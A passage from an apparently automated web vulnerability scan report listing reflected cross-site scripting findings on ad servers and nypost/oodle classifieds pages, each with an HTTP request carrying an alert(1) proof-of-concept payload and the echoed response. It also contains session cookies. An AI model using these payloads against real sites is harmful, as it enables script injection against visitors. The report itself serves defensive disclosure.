net/click%3Bh%3Dv8/3a5e/3/0/%2a/f%3B229319090%3B0-0%3B0%3B44600216%3B4307-300/250%3B34845515/34863370/1%3B%3B~fdr%3D231953222%3B0-0%3B0%3B37896040%3B4307-300/250%3B34862146/34880001/1%3B%3B~sscs%3D%3f&feec2"-alert(1)-"eb1713b52d2=1http://dimestore.com/defaultclick\">
...[SNIP]...

1.38. http://adserver.adtechus.com/addyn/3.0/5132/989306/0/170/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5132/989306/0/170/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17625'-alert(1)-'e1d9cf19487 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5132/989306/0/170/ADTECH;loc=100;target=_blank;sub1=javascript;sub2=noauto;misc=4054950;misc=1290805825390;rdclick=http://ad.doubleclick.net/click%3Bh%3Dv8/3a5e/3/0/%2a/l%3B229319091%3B0-0%3B0%3B44600216%3B4307-300/250%3B36359077/36376957/1%3B%3B~fdr%3D231953222%3B0-0%3B0%3B37896040%3B4307-300/250%3B34862146/34880001/1%3B%3B~sscs%3D%3f17625'-alert(1)-'e1d9cf19487 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/promotions/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
.net/click%3Bh%3Dv8/3a5e/3/0/%2a/l%3B229319091%3B0-0%3B0%3B44600216%3B4307-300/250%3B36359077/36376957/1%3B%3B~fdr%3D231953222%3B0-0%3B0%3B37896040%3B4307-300/250%3B34862146/34880001/1%3B%3B~sscs%3D%3f17625'-alert(1)-'e1d9cf19487http://clk.redcated/MRT/go/250056024/direct;wi.1;hi.1/01/804449534" target="_blank">
...[SNIP]...

1.39. http://adserver.adtechus.com/addyn/3.0/5132/989306/0/170/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5132/989306/0/170/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33e69'-alert(1)-'12352a774 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5132/989306/0/170/ADTECH;loc=100;target=_blank;sub1=javascript;sub2=noauto;misc=4054950;misc=1290805825390;rdclick=http://ad.doubleclick.net/click%3Bh%3Dv8/3a5e/3/0/%2a/l%3B229319091%3B0-0%3B0%3B44600216%3B4307-300/250%3B36359077/36376957/1%3B%3B~fdr%3D231953222%3B0-0%3B0%3B37896040%3B4307-300/250%3B34862146/34880001/1%3B%3B~sscs%3D%3f&33e69'-alert(1)-'12352a774=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/promotions/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
net/click%3Bh%3Dv8/3a5e/3/0/%2a/l%3B229319091%3B0-0%3B0%3B44600216%3B4307-300/250%3B36359077/36376957/1%3B%3B~fdr%3D231953222%3B0-0%3B0%3B37896040%3B4307-300/250%3B34862146/34880001/1%3B%3B~sscs%3D%3f&33e69'-alert(1)-'12352a774=1http://clk.redcated/MRT/go/250056024/direct;wi.1;hi.1/01/804455856" target="_blank">
...[SNIP]...

1.40. http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f48eb"-alert(1)-"c90fa3ab3ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x0&section=1584519&banned_pop_types=29&pop_times=1&pop_frequency=0&pop_nofreqcap=1\&f48eb"-alert(1)-"c90fa3ab3ed=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:48:50 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Fri, 26 Nov 2010 20:48:50 GMT
Pragma: no-cache
Content-Length: 4419
Age: 0
Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_pop_frequency = 0; rm_pop_times = 1; rm_pop_nofreqcap = 1; rm_pop_id = 1584519; rm_tag_type = "pop"; rm_url = "http://adserving.cpxinteractive.com/imp?Z=0x0&y=29&f48eb"-alert(1)-"c90fa3ab3ed=1&s=1584519&_salt=3452949406";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(
...[SNIP]...

1.41. http://apartments.classifieds.nypost.com/ajax/ping/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apartments.classifieds.nypost.com
Path:   /ajax/ping/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload adeb9"-alert(1)-"fbfe9df8c83 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ajax/pingadeb9"-alert(1)-"fbfe9df8c83/ HTTP/1.1
Host: apartments.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809430344; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY5Mzt9; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:51:29 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwNDY4OTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
;
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-newdomain";
cmSetProduction();
cmCreateErrorTag("nonclassifieds ajax/pingadeb9"-alert(1)-"fbfe9df8c83/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-newdomain");
</script>
...[SNIP]...

1.42. http://apartments.classifieds.nypost.com/ajax/ping/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apartments.classifieds.nypost.com
Path:   /ajax/ping/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51f71"><script>alert(1)</script>3d1d398a515 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ajax/ping51f71"><script>alert(1)</script>3d1d398a515/ HTTP/1.1
Host: apartments.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809430344; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY5Mzt9; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:51:29 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwNDY4OTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://apartments.oodle.com/ajax/ping51f71"><script>alert(1)</script>3d1d398a515/" />
...[SNIP]...

1.43. http://apartments.classifieds.nypost.com/post/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apartments.classifieds.nypost.com
Path:   /post/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b07a5"-alert(1)-"e41510f6096 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /post/?b07a5"-alert(1)-"e41510f6096=1 HTTP/1.1
Host: apartments.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809430344; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY5Mzt9; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:49:42 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwNDU4Mjt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
-post-_--_--_--_--_--_--_-newdomain";
odl.reporting.replyExtraFields = "ny-_-post-_-post-_--_-nypost-_-USA-_-nypost-_-post-_--_--_--_--_--_--_-newdomain";
cmSetProduction();
cmCreatePageviewTag("post ?b07a5"-alert(1)-"e41510f6096=1","10000023","","","ny-_-post-_-post-_-nypost USA-_-nypost-_-USA-_-nypost-_-post-_--_--_--_--_--_--_-newdomain");
</script>
...[SNIP]...

1.44. http://apartments.classifieds.nypost.com/post/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apartments.classifieds.nypost.com
Path:   /post/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 402ed"><script>alert(1)</script>65f26b72b6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /post/?402ed"><script>alert(1)</script>65f26b72b6c=1 HTTP/1.1
Host: apartments.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809430344; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY5Mzt9; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:49:41 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwNDU4MTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11480

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://apartments.oodle.com/post/?402ed"><script>alert(1)</script>65f26b72b6c=1" />
...[SNIP]...

1.45. http://apartments.oodle.com/regions/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apartments.oodle.com
Path:   /regions/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc3bf"-alert(1)-"ee4c3c54178 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /regions/?dc3bf"-alert(1)-"ee4c3c54178=1 HTTP/1.1
Host: apartments.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Fri, 26 Nov 2010 20:51:28 GMT
Content-Length: 23134
Connection: close
Set-Cookie: otu=479d7bb8883eb695ef5d9dc9e5d2cd26; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: ots=9a80a5cba383c56a293fa928e7762a79; path=/; domain=.oodle.com
Set-Cookie: a=dT1GMjUzQTJFOTRDRjAxREQx; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODA0Njg5O30%3D; path=/; domain=.oodle.com
Set-Cookie: loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: loc_USA_selected=aTowOw%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
nonclassifieds-_-nonclassifieds-_--_-www-_-USA-_-oodle-_-nonclassifieds-_--multivariate-partner-www_no_sil--_--_--_--_--_--_-newdomain";
cmSetProduction();
cmCreatePageviewTag("nonclassifieds regions/?dc3bf"-alert(1)-"ee4c3c54178=1","10000000","","","houston-_-nonclassifieds-_-nonclassifieds-_-www USA-_-www-_-USA-_-oodle-_-nonclassifieds-_--multivariate-partner-www_no_sil--_--_--_--_--_--_-newdomain");
</script>
...[SNIP]...

1.46. http://api.bizographics.com/v1/profile.redirect [api_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 2b8e6<script>alert(1)</script>78a5428e6c2 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=8dn4jnyemg4ky9svqgs28wds2b8e6<script>alert(1)</script>78a5428e6c2&admeld_user_id=5a738589-032a-45ab-a7ad-eba47ded6846&callback_url=http%3A%2F%2Ftag%2Eadmeld%2Ecom%2Fpixel%3Fadmeld%5Fdataprovider%5Fid%3D4 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/14/nypost/728x90/above-fold?t=1290805802796&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2Fp%2Fstatic%2Fsite_map_H9QJodTDYACLl6K25PCpdN&refer=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=11; BizoID=9e16e021-9703-4d88-b0c1-c427a2aba88d; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WV4QlNoWqeHUqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KehDiphzztl1Waj5XcunNcMDa7Re6IGD4lPlsZLzg8Y9xAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5iif3K3nnDdM5xEJhiiFqK28mJD3iidKfXxisS82BSc6FNV4ie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Fri, 26 Nov 2010 20:48:09 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 84
Connection: keep-alive

Unknown API key: (8dn4jnyemg4ky9svqgs28wds2b8e6<script>alert(1)</script>78a5428e6c2)

1.47. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the callback_url request parameter is copied into the HTML document as plain text between tags. The payload cbea5<script>alert(1)</script>02b6e20414e was submitted in the callback_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=8dn4jnyemg4ky9svqgs28wds&admeld_user_id=5a738589-032a-45ab-a7ad-eba47ded6846&callback_url=cbea5<script>alert(1)</script>02b6e20414e HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/14/nypost/728x90/above-fold?t=1290805802796&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2Fp%2Fstatic%2Fsite_map_H9QJodTDYACLl6K25PCpdN&refer=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=11; BizoID=9e16e021-9703-4d88-b0c1-c427a2aba88d; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WV4QlNoWqeHUqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KehDiphzztl1Waj5XcunNcMDa7Re6IGD4lPlsZLzg8Y9xAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5iif3K3nnDdM5xEJhiiFqK28mJD3iidKfXxisS82BSc6FNV4ie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Fri, 26 Nov 2010 20:48:12 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 58
Connection: keep-alive

Unknown Referer: cbea5<script>alert(1)</script>02b6e20414e

1.48. http://ar.voicefive.com/b/rc.pli [func parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 1468f<script>alert(1)</script>f0f715f44b8 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction1468f<script>alert(1)</script>f0f715f44b8&n=ar_int_p72205782&1290805842908 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/promotions/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
